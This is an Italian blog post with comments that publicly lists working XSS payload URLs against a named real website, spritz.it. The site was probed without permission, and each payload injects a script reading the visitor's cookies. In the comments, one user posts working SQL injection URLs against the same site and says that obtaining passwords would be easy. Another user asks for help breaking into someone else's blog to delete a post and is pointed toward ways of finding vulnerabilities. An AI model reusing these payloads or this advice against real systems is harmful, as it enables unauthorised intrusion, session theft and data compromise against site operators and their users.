Tecnologia e Digital Hacks
24-05-2007

Sicurezza sul sito spritz.it

Ieri per sfizio personale ho iniziato a controllare la sicurezza di un noto sito padovano: www.spritz.it I risultati? Davvero terribili. Solo sul campo xss troviamo una marea di link sfruttabili. Inoltre su molti di questi è possibile una sana SQL INJECTION, ma non ho voluto approfondire. Gli admin sono a conoscenza di queste vulnerabilità (mi sono informato poco fa) da più di un anno.. E non fanno niente. Bah.. se le vanno a cercare.. http://www.spritz.it/locali/comment_in.asp?ID_locale=22&nome=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E http://www.spritz.it/locali/scheda.asp?ID_locale=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E http://www.spritz.it/blog/blog.asp?bloggone=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E http://www.spritz.it/mercatino/annunci.asp?ID_categoria=1&categoria=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E http://www.spritz.it/forum/discussione.asp?topic_id=4714&forum_id=17&Topic_Title=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E&forum_title=TEMPO+LIBERO&M=0&S=1

Questo articolo è stato pubblicato il 31-12-1969 alle 18:33 e classificato in XSS.

8 Commenti a “Sicurezza sul sito spritz.it”

  1. plarz.it scrive:
    31-12-1969 alle 18:33

    Anche la community plarz.it ho sentito dire che ha qualche falla...però è fatto diversamente perchè usa php invece di ASP!

  2. Nick scrive:
    31-12-1969 alle 18:33

    Oook..:P.. Se la metti su questo tono ecco una sql injection sul sito spritz.it http://www.spritz.it/locali/scheda.asp?ID_locale=' OR 1=1/* perfettamente funzionante come si può vedere dai risultati. Ecco come controllare nuovamente: http://www.spritz.it/locali/scheda.asp?ID_locale=1' AND 1=0/* --> 0 risultati http://www.spritz.it/locali/scheda.asp?ID_locale=1' AND 1=1/* --> 1 risultato A questo punto basta poco per ottenere password.. ecc.. I miei non sono solo sospetti. Riguardo a plarz.it.. ora non ho tempo di approfondire.. so solo dell'xss nella shoutbox.. Spesso, proprio considerando che siti molto visitati sono per forza sicuri..non si fanno le dovute analisi di sicurezza..

  3. Alessia scrive:
    31-12-1969 alle 18:33

    Si però 1 conto è avere il sospetto che siano pieni di falle ed un conto è effettivamente sfruttarle. Non ho mai sentito di effettivi exploit nei due siti e considerato che hanno migliaia di visite al giorno dubito nessuno ci abbia mai provato o nessuno se ne sia accorto!

  4. Nick scrive:
    31-12-1969 alle 18:33

    Esatto.. ma basta guardare la shoutbox che non valida gli input..:D

  5. Nick scrive:
    31-12-1969 alle 18:33

    @erny Sicuramente, per essere un sito "appena nato", risulta essere molto più sicuro degli altri due presi in considerazione. Purtroppo però anche questo presenta gravi problemi di sql injection. Ad esempio la pagina locali.php risulta avere il campo id non filtrato.

  6. erny scrive:
    31-12-1969 alle 18:33

    Il più sicuro in fatto di sicurezza è www.spritzlandia.it curato da due smanettoni del php ;)

  7. anonimo scrive:
    31-12-1969 alle 18:33

    qual'è la vs proposta x difendersi da un utente che ha scritto offese molto pesanti in un blog?dopo avergli chiesto + che in modo umiliante di toglierle?...ho provato la injection ma nn sn riuscita ad entrare.voglio sl eliminare un documento.qno sa aiutarmi?...grazie.

  8. Nick scrive:
    31-12-1969 alle 18:33

    @anonimo Dipende dal blog e dalla piattaforma che utilizza. Per una piattaforma come Wordpress, ad esempio, il modo più semplice per trovare vulnerabilità è controllare periodicamente i ticket aperti nel sistema di sviluppo. Ti ricordo però che se il blog fa parte di una piattaforma come splinder, msn live, blogspot ecc. un messaggio sensato di segnalazione abuso viene preso quasi immediatamente in considerazione.